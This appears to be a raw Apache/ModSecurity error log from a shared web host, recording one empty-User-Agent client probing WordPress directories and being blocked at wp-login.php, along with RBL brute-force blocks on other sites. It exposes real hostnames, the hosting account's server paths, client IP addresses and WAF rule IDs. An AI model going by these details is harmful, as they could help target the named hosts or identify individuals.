[Tue May 26 13:33:40.420123 2026] [autoindex:error] [pid 512745:tid 512999] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/sitemaps/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:40.420819 2026] [security2:error] [pid 512745:tid 512999] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT3HKSB_s2CvZg7xN_KAAAAYY"]
[Tue May 26 13:33:40.608632 2026] [autoindex:error] [pid 512745:tid 512914] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/sodium_compat/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:40.609303 2026] [security2:error] [pid 512745:tid 512914] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT3HKSB_s2CvZg7xN_KgAAATE"]
[Tue May 26 13:33:40.814787 2026] [autoindex:error] [pid 512745:tid 512952] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/style-engine/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:40.815465 2026] [security2:error] [pid 512745:tid 512952] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT3HKSB_s2CvZg7xN_LwAAAVc"]
[Tue May 26 13:33:41.006855 2026] [autoindex:error] [pid 512745:tid 512986] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/theme-compat/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:41.007510 2026] [security2:error] [pid 512745:tid 512986] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT3HKSB_s2CvZg7xN_MwAAAXk"]
[Tue May 26 13:33:41.309991 2026] [autoindex:error] [pid 512745:tid 512956] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:41.311061 2026] [security2:error] [pid 512745:tid 512956] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT3XKSB_s2CvZg7xN_NAAAAVs"]
[Tue May 26 13:33:41.569406 2026] [autoindex:error] [pid 512745:tid 512927] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:41.570273 2026] [security2:error] [pid 512745:tid 512927] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT3XKSB_s2CvZg7xN_NgAAAT4"]
[Tue May 26 13:33:41.806017 2026] [autoindex:error] [pid 512745:tid 512944] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:41.806765 2026] [security2:error] [pid 512745:tid 512944] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT3XKSB_s2CvZg7xN_PwAAAU8"]
[Tue May 26 13:33:41.995096 2026] [security2:error] [pid 512745:tid 512920] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT3XKSB_s2CvZg7xN_RAAAATc"]
[Tue May 26 13:33:42.015155 2026] [security2:error] [pid 512745:tid 512930] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT3XKSB_s2CvZg7xN_OwAAAUE"]
[Tue May 26 13:33:42.194803 2026] [security2:error] [pid 512745:tid 512983] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT3nKSB_s2CvZg7xN_SAAAAXY"]
[Tue May 26 13:33:42.392146 2026] [security2:error] [pid 512745:tid 512917] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT3nKSB_s2CvZg7xN_TQAAATQ"]
[Tue May 26 13:33:42.598199 2026] [security2:error] [pid 512745:tid 512962] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT3nKSB_s2CvZg7xN_UgAAAWE"]
[Tue May 26 13:33:42.664348 2026] [security2:error] [pid 512745:tid 512833] [remote 88.198.165.116:40754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVT3nKSB_s2CvZg7xN_UAABHFc"]
[Tue May 26 13:33:42.892280 2026] [security2:error] [pid 512745:tid 512984] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT3nKSB_s2CvZg7xN_WwAAAXc"]
[Tue May 26 13:33:43.119675 2026] [security2:error] [pid 512745:tid 512961] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT33KSB_s2CvZg7xN_XgAAAWA"]
[Tue May 26 13:33:43.293703 2026] [security2:error] [pid 512745:tid 512979] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT33KSB_s2CvZg7xN_YwAAAXI"]
[Tue May 26 13:33:43.504091 2026] [autoindex:error] [pid 512745:tid 512907] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-content/plugins/classic-editor/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:43.504815 2026] [security2:error] [pid 512745:tid 512907] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT33KSB_s2CvZg7xN_agAAASo"]
[Tue May 26 13:33:43.696405 2026] [security2:error] [pid 512745:tid 512904] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT33KSB_s2CvZg7xN_bQAAASc"]
[Tue May 26 13:33:43.892529 2026] [security2:error] [pid 512745:tid 512914] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT33KSB_s2CvZg7xN_dAAAATE"]
[Tue May 26 13:33:44.114903 2026] [autoindex:error] [pid 512745:tid 512881] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-content/plugins/contact-form-7/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:44.115574 2026] [security2:error] [pid 512745:tid 512881] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT4HKSB_s2CvZg7xN_eQAAARA"]
[Tue May 26 13:33:44.268252 2026] [security2:error] [pid 512745:tid 512942] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT33KSB_s2CvZg7xN_cQAAAU0"]
[Tue May 26 13:33:44.310805 2026] [security2:error] [pid 512745:tid 512890] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT4HKSB_s2CvZg7xN_ggAAARk"]
[Tue May 26 13:33:44.554685 2026] [autoindex:error] [pid 512745:tid 512998] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-admin/images/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:44.555393 2026] [security2:error] [pid 512745:tid 512998] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT4HKSB_s2CvZg7xN_hAAAAYU"]
[Tue May 26 13:33:44.719615 2026] [security2:error] [pid 512745:tid 512919] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT4HKSB_s2CvZg7xN_hwAAATY"]
[Tue May 26 13:33:44.905660 2026] [security2:error] [pid 512745:tid 512997] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT4HKSB_s2CvZg7xN_igAAAYQ"]
[Tue May 26 13:33:45.090842 2026] [security2:error] [pid 512745:tid 512983] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT4XKSB_s2CvZg7xN_jwAAAXY"]
[Tue May 26 13:33:45.310145 2026] [security2:error] [pid 512745:tid 512875] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT4XKSB_s2CvZg7xN_lQAAAQo"]
[Tue May 26 13:33:45.502224 2026] [security2:error] [pid 512745:tid 512893] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT4XKSB_s2CvZg7xN_mQAAARw"]
[Tue May 26 13:33:45.699292 2026] [security2:error] [pid 512745:tid 513001] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT4XKSB_s2CvZg7xN_ngAAAYg"]
[Tue May 26 13:33:45.762430 2026] [security2:error] [pid 512344:tid 512566] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT4cbElyei4S77DQcSBAAAAFw"]
[Tue May 26 13:33:47.843242 2026] [security2:error] [pid 512745:tid 512950] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "cicodev.org"] [uri "/wp-admin/network/index.php"] [unique_id "ahVT4XKSB_s2CvZg7xN_pQAAAVU"]
[Tue May 26 13:33:47.861949 2026] [security2:error] [pid 512344:tid 512535] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT48bElyei4S77DQcSJgAAAD0"]
[Tue May 26 13:33:48.922494 2026] [security2:error] [pid 512344:tid 512522] [client 185.104.184.206:33086] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "cicodev.org"] [uri "/wp-admin/network/index.php"] [unique_id "ahVT5MbElyei4S77DQcSRAAAADA"]
[Tue May 26 13:33:49.399681 2026] [security2:error] [pid 512344:tid 512512] [client 185.104.184.206:33086] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "185.104.184.206" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "cicodev.org"] [uri "/wp-login.php"] [unique_id "ahVT5cbElyei4S77DQcSTQAAACY"]
[Tue May 26 13:33:49.399902 2026] [security2:error] [pid 512344:tid 512512] [client 185.104.184.206:33086] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "cicodev.org"] [uri "/wp-login.php"] [unique_id "ahVT5cbElyei4S77DQcSTQAAACY"]
[Tue May 26 13:33:49.832518 2026] [security2:error] [pid 512344:tid 512599] [client 185.104.184.206:51462] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "185.104.184.206" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1093"] [id "999023"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "cicodev.org"] [uri "/wp-admin/user/"] [unique_id "ahVT5cbElyei4S77DQcSZAAAAH0"]
[Tue May 26 13:33:49.832675 2026] [security2:error] [pid 512344:tid 512599] [client 185.104.184.206:51462] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "cicodev.org"] [uri "/wp-admin/user/"] [unique_id "ahVT5cbElyei4S77DQcSZAAAAH0"]
[Tue May 26 13:33:50.359922 2026] [security2:error] [pid 512344:tid 512555] [client 185.104.184.206:51466] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cicodev.org"] [uri "/wp-content/index.php"] [unique_id "ahVT5sbElyei4S77DQcSdwAAAFE"]
[Tue May 26 13:33:50.538056 2026] [security2:error] [pid 512344:tid 512594] [client 185.104.184.206:51466] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cicodev.org"] [uri "/wp-content/plugins/index.php"] [unique_id "ahVT5sbElyei4S77DQcSgQAAAHg"]
[Tue May 26 13:33:50.704957 2026] [security2:error] [pid 512344:tid 512598] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT5sbElyei4S77DQcSdAAAAHw"]
[Tue May 26 13:33:50.725671 2026] [security2:error] [pid 512344:tid 512502] [client 185.104.184.206:51466] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cicodev.org"] [uri "/wp-content/themes/index.php"] [unique_id "ahVT5sbElyei4S77DQcSggAAABw"]
[Tue May 26 13:33:50.970842 2026] [autoindex:error] [pid 512344:tid 512495] [client 185.104.184.206:51466] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-admin/includes/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:50.971548 2026] [security2:error] [pid 512344:tid 512495] [client 185.104.184.206:51466] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT5sbElyei4S77DQcSiQAAABU"]
[Tue May 26 13:33:51.470802 2026] [security2:error] [pid 512344:tid 512588] [client 185.104.184.206:51466] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "cicodev.org"] [uri "/wp-admin/index.php"] [unique_id "ahVT58bElyei4S77DQcSkAAAAHI"]
[Tue May 26 13:33:52.306777 2026] [security2:error] [pid 512344:tid 512504] [client 185.104.184.206:57404] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "cicodev.org"] [uri "/wp-admin/index.php"] [unique_id "ahVT6MbElyei4S77DQcSpwAAAB4"]
[Tue May 26 13:33:52.496593 2026] [security2:error] [pid 512344:tid 512527] [client 185.104.184.206:57404] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "185.104.184.206" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "cicodev.org"] [uri "/wp-login.php"] [unique_id "ahVT6MbElyei4S77DQcStAAAADU"]
[Tue May 26 13:33:52.496758 2026] [security2:error] [pid 512344:tid 512527] [client 185.104.184.206:57404] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "cicodev.org"] [uri "/wp-login.php"] [unique_id "ahVT6MbElyei4S77DQcStAAAADU"]
[Tue May 26 13:33:52.584793 2026] [security2:error] [pid 512344:tid 512587] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT6MbElyei4S77DQcSqgAAAHE"]
[Tue May 26 13:33:52.717004 2026] [autoindex:error] [pid 512344:tid 512501] [client 185.104.184.206:51466] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:52.717646 2026] [security2:error] [pid 512344:tid 512501] [client 185.104.184.206:51466] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT6MbElyei4S77DQcSuQAAABs"]
[Tue May 26 13:33:53.243113 2026] [security2:error] [pid 512344:tid 512462] [remote 123.30.233.13:48058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVT6cbElyei4S77DQcSwwAAanU"]
[Tue May 26 13:33:54.187185 2026] [security2:error] [pid 512344:tid 512448] [remote 47.128.47.144:21430] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cicodev.org"] [uri "/ressources/securite-alimentaire-foncier/709-aida-adopte-le-riz-local"] [unique_id "ahVT6sbElyei4S77DQcS6gAAV2c"]
[Tue May 26 13:33:54.512162 2026] [security2:error] [pid 512344:tid 512526] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT6sbElyei4S77DQcS6QAAADQ"]
[Tue May 26 13:33:55.549207 2026] [security2:error] [pid 512344:tid 512533] [client 146.174.160.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT68bElyei4S77DQcTAwAAADs"]
[Tue May 26 13:33:56.259559 2026] [security2:error] [pid 512344:tid 512347] [remote 103.11.102.106:50650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVT7MbElyei4S77DQcTGAAAawI"]
[Tue May 26 13:33:57.013992 2026] [security2:error] [pid 512344:tid 512474] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT7MbElyei4S77DQcTIwAAAAA"]
